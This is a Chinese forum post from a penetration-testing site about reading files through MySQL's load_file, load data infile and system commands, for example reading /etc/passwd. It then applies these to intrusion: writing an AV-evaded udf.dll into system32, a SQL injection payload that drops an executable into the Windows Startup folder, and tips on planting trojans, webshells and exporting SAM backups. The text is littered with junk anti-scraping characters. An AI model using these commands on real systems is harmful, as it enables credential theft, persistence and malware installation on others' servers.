中国网络渗透测试联盟

标题: mysql下读取文件的几种方式 [打印本页]

作者: admin    时间: 2012-9-13 16:34
标题: mysql下读取文件的几种方式
今天朋友问我如何在mysql下读取文件,把我问愣了,发现自己还是犯了不求甚解的毛病,因此特地查了下mysql使用手册。 $ |! q) m. y+ b
思路都一样,在拥有file权限的前提下,读取文件为字符串形式插入表中,然后读出表中数据,只是方式略有不同
/ ^. z* W3 A) m) o( l/ [: w+ I
  m) t8 p" |% fmysql3.x下 4 Q7 P7 w# Z+ E/ j& G$ Q7 C

& v* N( {# u! i# {7 G不确定mysql3.x下能否使用load_file()函数(我在mysql3使用手册上没有查到,但貌似是可以的),用 load data infile 读取文件,命令如下
5 h4 T3 W) r+ W: v; j* F& O: n4 u* X* c7 D+ W# x
mysql>create table a (cmd text); " H2 q/ F3 l  l7 j! [& u( P: ^- d1 M
mysql>load data infile 'c:\\boot.ini' into table a;
4 Q  @' S, m( @8 vmysql>select * from a;
3 B- k6 _# ~; b4 k6 ]7 i4 V* R# O- n/ W
mysql4.x下 5 z/ d5 T5 W2 X6 |6 c

- r) X! f3 i9 z9 M& m! Umysql4.x下除了 load data infile 外还可以用大家熟知的 load_file() 来读取,命令如下
8 S1 J+ H  u3 |$ M! y
. B8 K& w/ h# b1 `6 \mysql>create table a (cmd text); 9 m; P* ^+ p- X7 D( v& o
mysql>insert into a (cmd) values (load_file('c:\\boot.ini'));   d' f9 d! B! p* c* L: N) e; h
mysql>select * from a;
5 U1 z% P4 D0 g; W8 ?) t/ ~/ v, \3 V. _* T
mysql5.x下 7 y5 N( W1 i1 {: s
$ G, v; @* a0 E! U
在linux下,mysql5.x 除了上面两种方法,还可以利用 system 直接执行系统命令的方式来读取文件(是否必须root身份不确定,未测试),命令如下
; ?0 {" H5 `; X4 c( H9 R) O, T0 {4 E4 p/ J
mysql>system cat /etc/passwd
3 M( d: W6 V& L- y- J% z" I  B6 ?

! U$ @+ k% G/ E* M2 Q* c6 tmysql下读取文件在入侵中用到的时候不多,可能用于查询配置文件寻找web路径,或者webshell权限很小的时候读取其他格式的webshell内容然后用into outfile方式写入大马等,二进制文件也可以这样用,只是多了hex()和unhex()的工序。
* f9 ?; Y  O4 I0 C1 g' l, x5 d2 x/ _4 a2 _) P

  H" w2 w, ?2 G! G例:把免杀过的udf.dll文件插入系统目录
* ~9 D- b/ s5 P- Q* p2 }2 [
# y2 R. j7 w% u* `/ ]create table a (cmd LONGBLOB);
- j8 n6 x+ n5 l; ~insert into a (cmd) values (hex(load_file('c:\\windows\\temp\\udf.dll'))); & `7 O, U1 p/ E5 E1 C$ V
SELECT unhex(cmd) FROM a INTO DUMPFILE 'c:\\windows\\system32\\udf.dll'; 2 k$ k, s! ]  r( H, u+ Z3 u

1 B  f/ D+ m. q/ q其他的利用方法也很多,如把木马文件写入启动项,或者把加工过的cmd.exe文件导出到系统根目录下,把sam备份导出到可读目录等等,注入中应该也可以这样用(在不知道web路径又可以导出文件的情况下),大家自由发挥吧。   |! o: y, @' c3 A( e+ N
8 {( Y% l) x0 K( @: n3 C# O$ C4 G5 f  w

% c" D4 q( c+ x9 H/ a$ ?注入中的语法(未测试)
. i( A- _) m  M: b
  m/ y* ?* Q! |/ z) T; E, G- Q1 @( H' M1 o8 V4 m# v) a- g$ q
id=xxx and 1=2 union select 1,2,3,unhex(mm.exe的十六进制),5 INTO DUMPFILE 'C:\\Documents and Settings\\All Users\\「开始」菜单\程序\启动\\mm.exe'/*




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2